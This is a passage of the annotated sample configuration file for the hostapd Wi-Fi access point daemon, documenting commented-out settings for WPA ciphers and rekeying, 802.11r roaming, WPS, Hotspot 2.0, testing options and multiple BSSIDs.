1093 | # of (PSK,MAC address) pairs. This allows more than one PSK to be configured.
1094 | # Use absolute path name to make sure that the files can be read on SIGHUP
1095 | # configuration reloads.
1096 | #wpa_psk_file=/etc/hostapd.wpa_psk
1097 |
1098 | # Optionally, WPA passphrase can be received from RADIUS authentication server
1099 | # This requires macaddr_acl to be set to 2 (RADIUS)
1100 | # 0 = disabled (default)
1101 | # 1 = optional; use default passphrase/psk if RADIUS server does not include
1102 | # Tunnel-Password
1103 | # 2 = required; reject authentication if RADIUS server does not include
1104 | # Tunnel-Password
1105 | #wpa_psk_radius=0
1106 |
1107 | # Set of accepted key management algorithms (WPA-PSK, WPA-EAP, or both). The
1108 | # entries are separated with a space. WPA-PSK-SHA256 and WPA-EAP-SHA256 can be
1109 | # added to enable SHA256-based stronger algorithms.
1110 | # (dot11RSNAConfigAuthenticationSuitesTable)
1111 | #wpa_key_mgmt=WPA-PSK WPA-EAP
1112 |
1113 | # Set of accepted cipher suites (encryption algorithms) for pairwise keys
1114 | # (unicast packets). This is a space separated list of algorithms:
1115 | # CCMP = AES in Counter mode with CBC-MAC [RFC 3610, IEEE 802.11i/D7.0]
1116 | # TKIP = Temporal Key Integrity Protocol [IEEE 802.11i/D7.0]
1117 | # Group cipher suite (encryption algorithm for broadcast and multicast frames)
1118 | # is automatically selected based on this configuration. If only CCMP is
1119 | # allowed as the pairwise cipher, group cipher will also be CCMP. Otherwise,
1120 | # TKIP will be used as the group cipher.
1121 | # (dot11RSNAConfigPairwiseCiphersTable)
1122 | # Pairwise cipher for WPA (v1) (default: TKIP)
1123 | #wpa_pairwise=TKIP CCMP
1124 | # Pairwise cipher for RSN/WPA2 (default: use wpa_pairwise value)
1125 | #rsn_pairwise=CCMP
1126 |
1127 | # Time interval for rekeying GTK (broadcast/multicast encryption keys) in
1128 | # seconds. (dot11RSNAConfigGroupRekeyTime)
1129 | #wpa_group_rekey=600
1130 |
1131 | # Rekey GTK when any STA that possesses the current GTK is leaving the BSS.
1132 | # (dot11RSNAConfigGroupRekeyStrict)
1133 | #wpa_strict_rekey=1
1134 |
1135 | # Time interval for rekeying GMK (master key used internally to generate GTKs
1136 | # (in seconds).
1137 | #wpa_gmk_rekey=86400
1138 |
1139 | # Maximum lifetime for PTK in seconds. This can be used to enforce rekeying of
1140 | # PTK to mitigate some attacks against TKIP deficiencies.
1141 | #wpa_ptk_rekey=600
1142 |
1143 | # Enable IEEE 802.11i/RSN/WPA2 pre-authentication. This is used to speed up
1144 | # roaming be pre-authenticating IEEE 802.1X/EAP part of the full RSN
1145 | # authentication and key handshake before actually associating with a new AP.
1146 | # (dot11RSNAPreauthenticationEnabled)
1147 | #rsn_preauth=1
1148 | #
1149 | # Space separated list of interfaces from which pre-authentication frames are
1150 | # accepted (e.g., 'eth0' or 'eth0 wlan0wds0'. This list should include all
1151 | # interface that are used for connections to other APs. This could include
1152 | # wired interfaces and WDS links. The normal wireless data interface towards
1153 | # associated stations (e.g., wlan0) should not be added, since
1154 | # pre-authentication is only used with APs other than the currently associated
1155 | # one.
1156 | #rsn_preauth_interfaces=eth0
1157 |
1158 | # peerkey: Whether PeerKey negotiation for direct links (IEEE 802.11e) is
1159 | # allowed. This is only used with RSN/WPA2.
1160 | # 0 = disabled (default)
1161 | # 1 = enabled
1162 | #peerkey=1
1163 |
1164 | # ieee80211w: Whether management frame protection (MFP) is enabled
1165 | # 0 = disabled (default)
1166 | # 1 = optional
1167 | # 2 = required
1168 | #ieee80211w=0
1169 |
1170 | # Group management cipher suite
1171 | # Default: AES-128-CMAC (BIP)
1172 | # Other options (depending on driver support):
1173 | # BIP-GMAC-128
1174 | # BIP-GMAC-256
1175 | # BIP-CMAC-256
1176 | # Note: All the stations connecting to the BSS will also need to support the
1177 | # selected cipher. The default AES-128-CMAC is the only option that is commonly
1178 | # available in deployed devices.
1179 | #group_mgmt_cipher=AES-128-CMAC
1180 |
1181 | # Association SA Query maximum timeout (in TU = 1.024 ms; for MFP)
1182 | # (maximum time to wait for a SA Query response)
1183 | # dot11AssociationSAQueryMaximumTimeout, 1...4294967295
1184 | #assoc_sa_query_max_timeout=1000
1185 |
1186 | # Association SA Query retry timeout (in TU = 1.024 ms; for MFP)
1187 | # (time between two subsequent SA Query requests)
1188 | # dot11AssociationSAQueryRetryTimeout, 1...4294967295
1189 | #assoc_sa_query_retry_timeout=201
1190 |
1191 | # disable_pmksa_caching: Disable PMKSA caching
1192 | # This parameter can be used to disable caching of PMKSA created through EAP
1193 | # authentication. RSN preauthentication may still end up using PMKSA caching if
1194 | # it is enabled (rsn_preauth=1).
1195 | # 0 = PMKSA caching enabled (default)
1196 | # 1 = PMKSA caching disabled
1197 | #disable_pmksa_caching=0
1198 |
1199 | # okc: Opportunistic Key Caching (aka Proactive Key Caching)
1200 | # Allow PMK cache to be shared opportunistically among configured interfaces
1201 | # and BSSes (i.e., all configurations within a single hostapd process).
1202 | # 0 = disabled (default)
1203 | # 1 = enabled
1204 | #okc=1
1205 |
1206 | # SAE threshold for anti-clogging mechanism (dot11RSNASAEAntiCloggingThreshold)
1207 | # This parameter defines how many open SAE instances can be in progress at the
1208 | # same time before the anti-clogging mechanism is taken into use.
1209 | #sae_anti_clogging_threshold=5
1210 |
1211 | # Enabled SAE finite cyclic groups
1212 | # SAE implementation are required to support group 19 (ECC group defined over a
1213 | # 256-bit prime order field). All groups that are supported by the
1214 | # implementation are enabled by default. This configuration parameter can be
1215 | # used to specify a limited set of allowed groups. The group values are listed
1216 | # in the IANA registry:
1217 | # http://www.iana.org/assignments/ipsec-registry/ipsec-registry.xml#ipsec-registry-9
1218 | #sae_groups=19 20 21 25 26
1219 |
1220 | ##### IEEE 802.11r configuration ##############################################
1221 |
1222 | # Mobility Domain identifier (dot11FTMobilityDomainID, MDID)
1223 | # MDID is used to indicate a group of APs (within an ESS, i.e., sharing the
1224 | # same SSID) between which a STA can use Fast BSS Transition.
1225 | # 2-octet identifier as a hex string.
1226 | #mobility_domain=a1b2
1227 |
1228 | # PMK-R0 Key Holder identifier (dot11FTR0KeyHolderID)
1229 | # 1 to 48 octet identifier.
1230 | # This is configured with nas_identifier (see RADIUS client section above).
1231 |
1232 | # Default lifetime of the PMK-RO in minutes; range 1..65535
1233 | # (dot11FTR0KeyLifetime)
1234 | #r0_key_lifetime=10000
1235 |
1236 | # PMK-R1 Key Holder identifier (dot11FTR1KeyHolderID)
1237 | # 6-octet identifier as a hex string.
1238 | #r1_key_holder=000102030405
1239 |
1240 | # Reassociation deadline in time units (TUs / 1.024 ms; range 1000..65535)
1241 | # (dot11FTReassociationDeadline)
1242 | #reassociation_deadline=1000
1243 |
1244 | # List of R0KHs in the same Mobility Domain
1245 | # format: <128-bit key as hex string>
1246 | # This list is used to map R0KH-ID (NAS Identifier) to a destination MAC
1247 | # address when requesting PMK-R1 key from the R0KH that the STA used during the
1248 | # Initial Mobility Domain Association.
1249 | #r0kh=02:01:02:03:04:05 r0kh-1.example.com 000102030405060708090a0b0c0d0e0f
1250 | #r0kh=02:01:02:03:04:06 r0kh-2.example.com 00112233445566778899aabbccddeeff
1251 | # And so on.. One line per R0KH.
1252 |
1253 | # List of R1KHs in the same Mobility Domain
1254 | # format: <128-bit key as hex string>
1255 | # This list is used to map R1KH-ID to a destination MAC address when sending
1256 | # PMK-R1 key from the R0KH. This is also the list of authorized R1KHs in the MD
1257 | # that can request PMK-R1 keys.
1258 | #r1kh=02:01:02:03:04:05 02:11:22:33:44:55 000102030405060708090a0b0c0d0e0f
1259 | #r1kh=02:01:02:03:04:06 02:11:22:33:44:66 00112233445566778899aabbccddeeff
1260 | # And so on.. One line per R1KH.
1261 |
1262 | # Whether PMK-R1 push is enabled at R0KH
1263 | # 0 = do not push PMK-R1 to all configured R1KHs (default)
1264 | # 1 = push PMK-R1 to all configured R1KHs whenever a new PMK-R0 is derived
1265 | #pmk_r1_push=1
1266 |
1267 | ##### Neighbor table ##########################################################
1268 | # Maximum number of entries kept in AP table (either for neigbor table or for
1269 | # detecting Overlapping Legacy BSS Condition). The oldest entry will be
1270 | # removed when adding a new entry that would make the list grow over this
1271 | # limit. Note! WFA certification for IEEE 802.11g requires that OLBC is
1272 | # enabled, so this field should not be set to 0 when using IEEE 802.11g.
1273 | # default: 255
1274 | #ap_table_max_size=255
1275 |
1276 | # Number of seconds of no frames received after which entries may be deleted
1277 | # from the AP table. Since passive scanning is not usually performed frequently
1278 | # this should not be set to very small value. In addition, there is no
1279 | # guarantee that every scan cycle will receive beacon frames from the
1280 | # neighboring APs.
1281 | # default: 60
1282 | #ap_table_expiration_time=3600
1283 |
1284 |
1285 | ##### Wi-Fi Protected Setup (WPS) #############################################
1286 |
1287 | # WPS state
1288 | # 0 = WPS disabled (default)
1289 | # 1 = WPS enabled, not configured
1290 | # 2 = WPS enabled, configured
1291 | #wps_state=2
1292 |
1293 | # Whether to manage this interface independently from other WPS interfaces
1294 | # By default, a single hostapd process applies WPS operations to all configured
1295 | # interfaces. This parameter can be used to disable that behavior for a subset
1296 | # of interfaces. If this is set to non-zero for an interface, WPS commands
1297 | # issued on that interface do not apply to other interfaces and WPS operations
1298 | # performed on other interfaces do not affect this interface.
1299 | #wps_independent=0
1300 |
1301 | # AP can be configured into a locked state where new WPS Registrar are not
1302 | # accepted, but previously authorized Registrars (including the internal one)
1303 | # can continue to add new Enrollees.
1304 | #ap_setup_locked=1
1305 |
1306 | # Universally Unique IDentifier (UUID; see RFC 4122) of the device
1307 | # This value is used as the UUID for the internal WPS Registrar. If the AP
1308 | # is also using UPnP, this value should be set to the device's UPnP UUID.
1309 | # If not configured, UUID will be generated based on the local MAC address.
1310 | #uuid=12345678-9abc-def0-1234-56789abcdef0
1311 |
1312 | # Note: If wpa_psk_file is set, WPS is used to generate random, per-device PSKs
1313 | # that will be appended to the wpa_psk_file. If wpa_psk_file is not set, the
1314 | # default PSK (wpa_psk/wpa_passphrase) will be delivered to Enrollees. Use of
1315 | # per-device PSKs is recommended as the more secure option (i.e., make sure to
1316 | # set wpa_psk_file when using WPS with WPA-PSK).
1317 |
1318 | # When an Enrollee requests access to the network with PIN method, the Enrollee
1319 | # PIN will need to be entered for the Registrar. PIN request notifications are
1320 | # sent to hostapd ctrl_iface monitor. In addition, they can be written to a
1321 | # text file that could be used, e.g., to populate the AP administration UI with
1322 | # pending PIN requests. If the following variable is set, the PIN requests will
1323 | # be written to the configured file.
1324 | #wps_pin_requests=/var/run/hostapd_wps_pin_requests
1325 |
1326 | # Device Name
1327 | # User-friendly description of device; up to 32 octets encoded in UTF-8
1328 | #device_name=Wireless AP
1329 |
1330 | # Manufacturer
1331 | # The manufacturer of the device (up to 64 ASCII characters)
1332 | #manufacturer=Company
1333 |
1334 | # Model Name
1335 | # Model of the device (up to 32 ASCII characters)
1336 | #model_name=WAP
1337 |
1338 | # Model Number
1339 | # Additional device description (up to 32 ASCII characters)
1340 | #model_number=123
1341 |
1342 | # Serial Number
1343 | # Serial number of the device (up to 32 characters)
1344 | #serial_number=12345
1345 |
1346 | # Primary Device Type
1347 | # Used format: --
1348 | # categ = Category as an integer value
1349 | # OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for
1350 | # default WPS OUI
1351 | # subcateg = OUI-specific Sub Category as an integer value
1352 | # Examples:
1353 | # 1-0050F204-1 (Computer / PC)
1354 | # 1-0050F204-2 (Computer / Server)
1355 | # 5-0050F204-1 (Storage / NAS)
1356 | # 6-0050F204-1 (Network Infrastructure / AP)
1357 | #device_type=6-0050F204-1
1358 |
1359 | # OS Version
1360 | # 4-octet operating system version number (hex string)
1361 | #os_version=01020300
1362 |
1363 | # Config Methods
1364 | # List of the supported configuration methods
1365 | # Available methods: usba ethernet label display ext_nfc_token int_nfc_token
1366 | # nfc_interface push_button keypad virtual_display physical_display
1367 | # virtual_push_button physical_push_button
1368 | #config_methods=label virtual_display virtual_push_button keypad
1369 |
1370 | # WPS capability discovery workaround for PBC with Windows 7
1371 | # Windows 7 uses incorrect way of figuring out AP's WPS capabilities by acting
1372 | # as a Registrar and using M1 from the AP. The config methods attribute in that
1373 | # message is supposed to indicate only the configuration method supported by
1374 | # the AP in Enrollee role, i.e., to add an external Registrar. For that case,
1375 | # PBC shall not be used and as such, the PushButton config method is removed
1376 | # from M1 by default. If pbc_in_m1=1 is included in the configuration file,
1377 | # the PushButton config method is left in M1 (if included in config_methods
1378 | # parameter) to allow Windows 7 to use PBC instead of PIN (e.g., from a label
1379 | # in the AP).
1380 | #pbc_in_m1=1
1381 |
1382 | # Static access point PIN for initial configuration and adding Registrars
1383 | # If not set, hostapd will not allow external WPS Registrars to control the
1384 | # access point. The AP PIN can also be set at runtime with hostapd_cli
1385 | # wps_ap_pin command. Use of temporary (enabled by user action) and random
1386 | # AP PIN is much more secure than configuring a static AP PIN here. As such,
1387 | # use of the ap_pin parameter is not recommended if the AP device has means for
1388 | # displaying a random PIN.
1389 | #ap_pin=12345670
1390 |
1391 | # Skip building of automatic WPS credential
1392 | # This can be used to allow the automatically generated Credential attribute to
1393 | # be replaced with pre-configured Credential(s).
1394 | #skip_cred_build=1
1395 |
1396 | # Additional Credential attribute(s)
1397 | # This option can be used to add pre-configured Credential attributes into M8
1398 | # message when acting as a Registrar. If skip_cred_build=1, this data will also
1399 | # be able to override the Credential attribute that would have otherwise been
1400 | # automatically generated based on network configuration. This configuration
1401 | # option points to an external file that much contain the WPS Credential
1402 | # attribute(s) as binary data.
1403 | #extra_cred=hostapd.cred
1404 |
1405 | # Credential processing
1406 | # 0 = process received credentials internally (default)
1407 | # 1 = do not process received credentials; just pass them over ctrl_iface to
1408 | # external program(s)
1409 | # 2 = process received credentials internally and pass them over ctrl_iface
1410 | # to external program(s)
1411 | # Note: With wps_cred_processing=1, skip_cred_build should be set to 1 and
1412 | # extra_cred be used to provide the Credential data for Enrollees.
1413 | #
1414 | # wps_cred_processing=1 will disabled automatic updates of hostapd.conf file
1415 | # both for Credential processing and for marking AP Setup Locked based on
1416 | # validation failures of AP PIN. An external program is responsible on updating
1417 | # the configuration appropriately in this case.
1418 | #wps_cred_processing=0
1419 |
1420 | # AP Settings Attributes for M7
1421 | # By default, hostapd generates the AP Settings Attributes for M7 based on the
1422 | # current configuration. It is possible to override this by providing a file
1423 | # with pre-configured attributes. This is similar to extra_cred file format,
1424 | # but the AP Settings attributes are not encapsulated in a Credential
1425 | # attribute.
1426 | #ap_settings=hostapd.ap_settings
1427 |
1428 | # WPS UPnP interface
1429 | # If set, support for external Registrars is enabled.
1430 | #upnp_iface=br0
1431 |
1432 | # Friendly Name (required for UPnP)
1433 | # Short description for end use. Should be less than 64 characters.
1434 | #friendly_name=WPS Access Point
1435 |
1436 | # Manufacturer URL (optional for UPnP)
1437 | #manufacturer_url=http://www.example.com/
1438 |
1439 | # Model Description (recommended for UPnP)
1440 | # Long description for end user. Should be less than 128 characters.
1441 | #model_description=Wireless Access Point
1442 |
1443 | # Model URL (optional for UPnP)
1444 | #model_url=http://www.example.com/model/
1445 |
1446 | # Universal Product Code (optional for UPnP)
1447 | # 12-digit, all-numeric code that identifies the consumer package.
1448 | #upc=123456789012
1449 |
1450 | # WPS RF Bands (a = 5G, b = 2.4G, g = 2.4G, ag = dual band)
1451 | # This value should be set according to RF band(s) supported by the AP if
1452 | # hw_mode is not set. For dual band dual concurrent devices, this needs to be
1453 | # set to ag to allow both RF bands to be advertized.
1454 | #wps_rf_bands=ag
1455 |
1456 | # NFC password token for WPS
1457 | # These parameters can be used to configure a fixed NFC password token for the
1458 | # AP. This can be generated, e.g., with nfc_pw_token from wpa_supplicant. When
1459 | # these parameters are used, the AP is assumed to be deployed with a NFC tag
1460 | # that includes the matching NFC password token (e.g., written based on the
1461 | # NDEF record from nfc_pw_token).
1462 | #
1463 | #wps_nfc_dev_pw_id: Device Password ID (16..65535)
1464 | #wps_nfc_dh_pubkey: Hexdump of DH Public Key
1465 | #wps_nfc_dh_privkey: Hexdump of DH Private Key
1466 | #wps_nfc_dev_pw: Hexdump of Device Password
1467 |
1468 | ##### Wi-Fi Direct (P2P) ######################################################
1469 |
1470 | # Enable P2P Device management
1471 | #manage_p2p=1
1472 |
1473 | # Allow cross connection
1474 | #allow_cross_connection=1
1475 |
1476 | #### TDLS (IEEE 802.11z-2010) #################################################
1477 |
1478 | # Prohibit use of TDLS in this BSS
1479 | #tdls_prohibit=1
1480 |
1481 | # Prohibit use of TDLS Channel Switching in this BSS
1482 | #tdls_prohibit_chan_switch=1
1483 |
1484 | ##### IEEE 802.11v-2011 #######################################################
1485 |
1486 | # Time advertisement
1487 | # 0 = disabled (default)
1488 | # 2 = UTC time at which the TSF timer is 0
1489 | #time_advertisement=2
1490 |
1491 | # Local time zone as specified in 8.3 of IEEE Std 1003.1-2004:
1492 | # stdoffset[dst[offset][,start[/time],end[/time]]]
1493 | #time_zone=EST5
1494 |
1495 | # WNM-Sleep Mode (extended sleep mode for stations)
1496 | # 0 = disabled (default)
1497 | # 1 = enabled (allow stations to use WNM-Sleep Mode)
1498 | #wnm_sleep_mode=1
1499 |
1500 | # BSS Transition Management
1501 | # 0 = disabled (default)
1502 | # 1 = enabled
1503 | #bss_transition=1
1504 |
1505 | ##### IEEE 802.11u-2011 #######################################################
1506 |
1507 | # Enable Interworking service
1508 | #interworking=1
1509 |
1510 | # Access Network Type
1511 | # 0 = Private network
1512 | # 1 = Private network with guest access
1513 | # 2 = Chargeable public network
1514 | # 3 = Free public network
1515 | # 4 = Personal device network
1516 | # 5 = Emergency services only network
1517 | # 14 = Test or experimental
1518 | # 15 = Wildcard
1519 | #access_network_type=0
1520 |
1521 | # Whether the network provides connectivity to the Internet
1522 | # 0 = Unspecified
1523 | # 1 = Network provides connectivity to the Internet
1524 | #internet=1
1525 |
1526 | # Additional Step Required for Access
1527 | # Note: This is only used with open network, i.e., ASRA shall ne set to 0 if
1528 | # RSN is used.
1529 | #asra=0
1530 |
1531 | # Emergency services reachable
1532 | #esr=0
1533 |
1534 | # Unauthenticated emergency service accessible
1535 | #uesa=0
1536 |
1537 | # Venue Info (optional)
1538 | # The available values are defined in IEEE Std 802.11u-2011, 7.3.1.34.
1539 | # Example values (group,type):
1540 | # 0,0 = Unspecified
1541 | # 1,7 = Convention Center
1542 | # 1,13 = Coffee Shop
1543 | # 2,0 = Unspecified Business
1544 | # 7,1 Private Residence
1545 | #venue_group=7
1546 | #venue_type=1
1547 |
1548 | # Homogeneous ESS identifier (optional; dot11HESSID)
1549 | # If set, this shall be identifical to one of the BSSIDs in the homogeneous
1550 | # ESS and this shall be set to the same value across all BSSs in homogeneous
1551 | # ESS.
1552 | #hessid=02:03:04:05:06:07
1553 |
1554 | # Roaming Consortium List
1555 | # Arbitrary number of Roaming Consortium OIs can be configured with each line
1556 | # adding a new OI to the list. The first three entries are available through
1557 | # Beacon and Probe Response frames. Any additional entry will be available only
1558 | # through ANQP queries. Each OI is between 3 and 15 octets and is configured as
1559 | # a hexstring.
1560 | #roaming_consortium=021122
1561 | #roaming_consortium=2233445566
1562 |
1563 | # Venue Name information
1564 | # This parameter can be used to configure one or more Venue Name Duples for
1565 | # Venue Name ANQP information. Each entry has a two or three character language
1566 | # code (ISO-639) separated by colon from the venue name string.
1567 | # Note that venue_group and venue_type have to be set for Venue Name
1568 | # information to be complete.
1569 | #venue_name=eng:Example venue
1570 | #venue_name=fin:Esimerkkipaikka
1571 | # Alternative format for language:value strings:
1572 | # (double quoted string, printf-escaped string)
1573 | #venue_name=P"eng:Example\nvenue"
1574 |
1575 | # Network Authentication Type
1576 | # This parameter indicates what type of network authentication is used in the
1577 | # network.
1578 | # format: [redirect URL]
1579 | # Network Authentication Type Indicator values:
1580 | # 00 = Acceptance of terms and conditions
1581 | # 01 = On-line enrollment supported
1582 | # 02 = http/https redirection
1583 | # 03 = DNS redirection
1584 | #network_auth_type=00
1585 | #network_auth_type=02http://www.example.com/redirect/me/here/
1586 |
1587 | # IP Address Type Availability
1588 | # format: <1-octet encoded value as hex str>
1589 | # (ipv4_type & 0x3f) << 2 | (ipv6_type & 0x3)
1590 | # ipv4_type:
1591 | # 0 = Address type not available
1592 | # 1 = Public IPv4 address available
1593 | # 2 = Port-restricted IPv4 address available
1594 | # 3 = Single NATed private IPv4 address available
1595 | # 4 = Double NATed private IPv4 address available
1596 | # 5 = Port-restricted IPv4 address and single NATed IPv4 address available
1597 | # 6 = Port-restricted IPv4 address and double NATed IPv4 address available
1598 | # 7 = Availability of the address type is not known
1599 | # ipv6_type:
1600 | # 0 = Address type not available
1601 | # 1 = Address type available
1602 | # 2 = Availability of the address type not known
1603 | #ipaddr_type_availability=14
1604 |
1605 | # Domain Name
1606 | # format: [,]
1607 | #domain_name=example.com,another.example.com,yet-another.example.com
1608 |
1609 | # 3GPP Cellular Network information
1610 | # format: [;][;...]
1611 | #anqp_3gpp_cell_net=244,91;310,026;234,56
1612 |
1613 | # NAI Realm information
1614 | # One or more realm can be advertised. Each nai_realm line adds a new realm to
1615 | # the set. These parameters provide information for stations using Interworking
1616 | # network selection to allow automatic connection to a network based on
1617 | # credentials.
1618 | # format: ,[,][,][,...]
1619 | # encoding:
1620 | # 0 = Realm formatted in accordance with IETF RFC 4282
1621 | # 1 = UTF-8 formatted character string that is not formatted in
1622 | # accordance with IETF RFC 4282
1623 | # NAI Realm(s): Semi-colon delimited NAI Realm(s)
1624 | # EAP Method: [:<[AuthParam1:Val1]>][<[AuthParam2:Val2]>][...]
1625 | # EAP Method types, see:
1626 | # http://www.iana.org/assignments/eap-numbers/eap-numbers.xhtml#eap-numbers-4
1627 | # AuthParam (Table 8-188 in IEEE Std 802.11-2012):
1628 | # ID 2 = Non-EAP Inner Authentication Type
1629 | # 1 = PAP, 2 = CHAP, 3 = MSCHAP, 4 = MSCHAPV2
1630 | # ID 3 = Inner authentication EAP Method Type
1631 | # ID 5 = Credential Type
1632 | # 1 = SIM, 2 = USIM, 3 = NFC Secure Element, 4 = Hardware Token,
1633 | # 5 = Softoken, 6 = Certificate, 7 = username/password, 9 = Anonymous,
1634 | # 10 = Vendor Specific
1635 | #nai_realm=0,example.com;example.net
1636 | # EAP methods EAP-TLS with certificate and EAP-TTLS/MSCHAPv2 with
1637 | # username/password
1638 | #nai_realm=0,example.org,13[5:6],21[2:4][5:7]
1639 |
1640 | # QoS Map Set configuration
1641 | #
1642 | # Comma delimited QoS Map Set in decimal values
1643 | # (see IEEE Std 802.11-2012, 8.4.2.97)
1644 | #
1645 | # format:
1646 | # [,],...
1647 | #
1648 | # There can be up to 21 optional DSCP Exceptions which are pairs of DSCP Value
1649 | # (0..63 or 255) and User Priority (0..7). This is followed by eight DSCP Range
1650 | # descriptions with DSCP Low Value and DSCP High Value pairs (0..63 or 255) for
1651 | # each UP starting from 0. If both low and high value are set to 255, the
1652 | # corresponding UP is not used.
1653 | #
1654 | # default: not set
1655 | #qos_map_set=53,2,22,6,8,15,0,7,255,255,16,31,32,39,255,255,40,47,255,255
1656 |
1657 | ##### Hotspot 2.0 #############################################################
1658 |
1659 | # Enable Hotspot 2.0 support
1660 | #hs20=1
1661 |
1662 | # Disable Downstream Group-Addressed Forwarding (DGAF)
1663 | # This can be used to configure a network where no group-addressed frames are
1664 | # allowed. The AP will not forward any group-address frames to the stations and
1665 | # random GTKs are issued for each station to prevent associated stations from
1666 | # forging such frames to other stations in the BSS.
1667 | #disable_dgaf=1
1668 |
1669 | # OSU Server-Only Authenticated L2 Encryption Network
1670 | #osen=1
1671 |
1672 | # ANQP Domain ID (0..65535)
1673 | # An identifier for a set of APs in an ESS that share the same common ANQP
1674 | # information. 0 = Some of the ANQP information is unique to this AP (default).
1675 | #anqp_domain_id=1234
1676 |
1677 | # Deauthentication request timeout
1678 | # If the RADIUS server indicates that the station is not allowed to connect to
1679 | # the BSS/ESS, the AP can allow the station some time to download a
1680 | # notification page (URL included in the message). This parameter sets that
1681 | # timeout in seconds.
1682 | #hs20_deauth_req_timeout=60
1683 |
1684 | # Operator Friendly Name
1685 | # This parameter can be used to configure one or more Operator Friendly Name
1686 | # Duples. Each entry has a two or three character language code (ISO-639)
1687 | # separated by colon from the operator friendly name string.
1688 | #hs20_oper_friendly_name=eng:Example operator
1689 | #hs20_oper_friendly_name=fin:Esimerkkioperaattori
1690 |
1691 | # Connection Capability
1692 | # This can be used to advertise what type of IP traffic can be sent through the
1693 | # hotspot (e.g., due to firewall allowing/blocking protocols/ports).
1694 | # format: ::
1695 | # IP Protocol: 1 = ICMP, 6 = TCP, 17 = UDP
1696 | # Port Number: 0..65535
1697 | # Status: 0 = Closed, 1 = Open, 2 = Unknown
1698 | # Each hs20_conn_capab line is added to the list of advertised tuples.
1699 | #hs20_conn_capab=1:0:2
1700 | #hs20_conn_capab=6:22:1
1701 | #hs20_conn_capab=17:5060:0
1702 |
1703 | # WAN Metrics
1704 | # format: :::::
1705 | # WAN Info: B0-B1: Link Status, B2: Symmetric Link, B3: At Capabity
1706 | # (encoded as two hex digits)
1707 | # Link Status: 1 = Link up, 2 = Link down, 3 = Link in test state
1708 | # Downlink Speed: Estimate of WAN backhaul link current downlink speed in kbps;
1709 | # 1..4294967295; 0 = unknown
1710 | # Uplink Speed: Estimate of WAN backhaul link current uplink speed in kbps
1711 | # 1..4294967295; 0 = unknown
1712 | # Downlink Load: Current load of downlink WAN connection (scaled to 255 = 100%)
1713 | # Uplink Load: Current load of uplink WAN connection (scaled to 255 = 100%)
1714 | # Load Measurement Duration: Duration for measuring downlink/uplink load in
1715 | # tenths of a second (1..65535); 0 if load cannot be determined
1716 | #hs20_wan_metrics=01:8000:1000:80:240:3000
1717 |
1718 | # Operating Class Indication
1719 | # List of operating classes the BSSes in this ESS use. The Global operating
1720 | # classes in Table E-4 of IEEE Std 802.11-2012 Annex E define the values that
1721 | # can be used in this.
1722 | # format: hexdump of operating class octets
1723 | # for example, operating classes 81 (2.4 GHz channels 1-13) and 115 (5 GHz
1724 | # channels 36-48):
1725 | #hs20_operating_class=5173
1726 |
1727 | # OSU icons
1728 | # :::::
1729 | #hs20_icon=32:32:eng:image/png:icon32:/tmp/icon32.png
1730 | #hs20_icon=64:64:eng:image/png:icon64:/tmp/icon64.png
1731 |
1732 | # OSU SSID (see ssid2 for format description)
1733 | # This is the SSID used for all OSU connections to all the listed OSU Providers.
1734 | #osu_ssid="example"
1735 |
1736 | # OSU Providers
1737 | # One or more sets of following parameter. Each OSU provider is started by the
1738 | # mandatory osu_server_uri item. The other parameters add information for the
1739 | # last added OSU provider.
1740 | #
1741 | #osu_server_uri=https://example.com/osu/
1742 | #osu_friendly_name=eng:Example operator
1743 | #osu_friendly_name=fin:Esimerkkipalveluntarjoaja
1744 | #osu_nai=anonymous@example.com
1745 | #osu_method_list=1 0
1746 | #osu_icon=icon32
1747 | #osu_icon=icon64
1748 | #osu_service_desc=eng:Example services
1749 | #osu_service_desc=fin:Esimerkkipalveluja
1750 | #
1751 | #osu_server_uri=...
1752 |
1753 | ##### TESTING OPTIONS #########################################################
1754 | #
1755 | # The options in this section are only available when the build configuration
1756 | # option CONFIG_TESTING_OPTIONS is set while compiling hostapd. They allow
1757 | # testing some scenarios that are otherwise difficult to reproduce.
1758 | #
1759 | # Ignore probe requests sent to hostapd with the given probability, must be a
1760 | # floating point number in the range [0, 1).
1761 | #ignore_probe_probability=0.0
1762 | #
1763 | # Ignore authentication frames with the given probability
1764 | #ignore_auth_probability=0.0
1765 | #
1766 | # Ignore association requests with the given probability
1767 | #ignore_assoc_probability=0.0
1768 | #
1769 | # Ignore reassociation requests with the given probability
1770 | #ignore_reassoc_probability=0.0
1771 | #
1772 | # Corrupt Key MIC in GTK rekey EAPOL-Key frames with the given probability
1773 | #corrupt_gtk_rekey_mic_probability=0.0
1774 |
1775 | ##### Multiple BSSID support ##################################################
1776 | #
1777 | # Above configuration is using the default interface (wlan#, or multi-SSID VLAN
1778 | # interfaces). Other BSSIDs can be added by using separator 'bss' with
1779 | # default interface name to be allocated for the data packets of the new BSS.
1780 | #
1781 | # hostapd will generate BSSID mask based on the BSSIDs that are
1782 | # configured. hostapd will verify that dev_addr & MASK == dev_addr. If this is
1783 | # not the case, the MAC address of the radio must be changed before starting
1784 | # hostapd (ifconfig wlan0 hw ether ). If a BSSID is configured for
1785 | # every secondary BSS, this limitation is not applied at hostapd and other
1786 | # masks may be used if the driver supports them (e.g., swap the locally
1787 | # administered bit)
1788 | #
1789 | # BSSIDs are assigned in order to each BSS, unless an explicit BSSID is
1790 | # specified using the 'bssid' parameter.
1791 | # If an explicit BSSID is specified, it must be chosen such that it:
1792 | # - results in a valid MASK that covers it and the dev_addr
1793 | # - is not the same as the MAC address of the radio
1794 | # - is not the same as any other explicitly specified BSSID
1795 | #
1796 | # Not all drivers support multiple BSSes. The exact mechanism for determining
1797 | # the driver capabilities is driver specific. With the current (i.e., a recent
1798 | # kernel) drivers using nl80211, this information can be checked with "iw list"
1799 | # (search for "valid interface combinations").
1800 | #
1801 | # Please note that hostapd uses some of the values configured for the first BSS
1802 | # as the defaults for the following BSSes. However, it is recommended that all
1803 | # BSSes include explicit configuration of all relevant configuration items.
1804 | #
1805 | #bss=wlan0_0
1806 | #ssid=test2
1807 | # most of the above items can be used here (apart from radio interface specific
1808 | # items, like channel)
1809 |
1810 | #bss=wlan0_1
1811 | #bssid=00:13:10:95:fe:0b
1812 | # ...
1813 |
--------------------------------------------------------------------------------